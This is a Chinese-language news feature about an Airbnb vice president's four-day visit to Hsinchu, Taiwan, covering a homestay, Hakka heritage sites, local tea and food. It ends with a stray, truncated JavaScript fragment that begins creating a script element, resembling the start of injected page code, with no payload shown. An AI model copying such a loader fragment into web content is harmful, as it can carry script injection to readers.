全球最大民宿網路平台「」全球副總裁暨公共事務負責人克里斯勒漢()近日特別訪台,體驗台灣風景、美食、文化。克里斯勒漢表示,想把在台灣的這份美好推薦給世界旅人。

 

克里斯勒漢一連在台灣待上四天,前兩天主要落腳於新竹,住進建築在水上的特色居所「二泉民宿」。白天再由新竹北埔文化工作室的古武南老師領軍,帶著克里斯勒漢穿梭紅磚老屋、巷弄,走訪北埔金廣福、客家老聚落、姜家洋樓、水堂、水井茶堂、意念工房等。

 

台灣的民宿有著溫暖的人、故事,其中,水井茶堂內的木製圓窗、窗櫺,葡萄藤木雕,雕花羅漢床(俗稱鴉片床),讓克里斯勒漢感覺彷彿時間凍結在歷史那一剎那,與古人交錯的時光,感受深刻。在水堂,品嚐在地特色茶「椪風茶」(又稱白毫烏龍茶),茶香中帶有蜂蜜和熟果香,入口滑潤,讓他讚不絕口。

對於客家美食,克里斯勒漢更是難忘。從客家湯圓的美味,以及體驗「客家擂茶」,用豆類、穀類磨成的粉,加入花生、芝麻、茶葉末,沖入熱水,配上烘炒過的白米,克里斯勒漢喝下一口,濃郁的茶香混合米香在嘴中化開,他說:「沒想到茶葉還可以變甜食,又驚又喜!」

 

由於克里斯勒漢有晨跑習慣,一早他在峨眉湖周邊遇上了天恩彌勒院的大佛,這尊全台最大尊彌勒佛,手持地球,象徵世界一家,克里斯勒漢打趣地分享,覺得是天意,就是讓他要把台灣、把新竹推向國際。

 

克里斯勒漢認為,「台灣很早就有民宿文化,跟Airbnb要做的事很像,所以非常適合把台灣向外推展。」他指出未來千禧世代的旅遊,不再是單純買東西,而是買體驗,旅人厭倦了走馬看花,深度旅遊才是未來趨勢,應該把「旅遊的決定權交回人手上!」

 

台灣這片具有文化歷史的土地,有美食、有美景,更有溫暖濃厚的人情味,他相信,來台灣的旅人,都可以在旅行中找到動人交織的故事,再把這份美好「背」到世界各地,告訴全世界,台灣有多好!

 

 var d=document;var s=d.createElement(‘script’);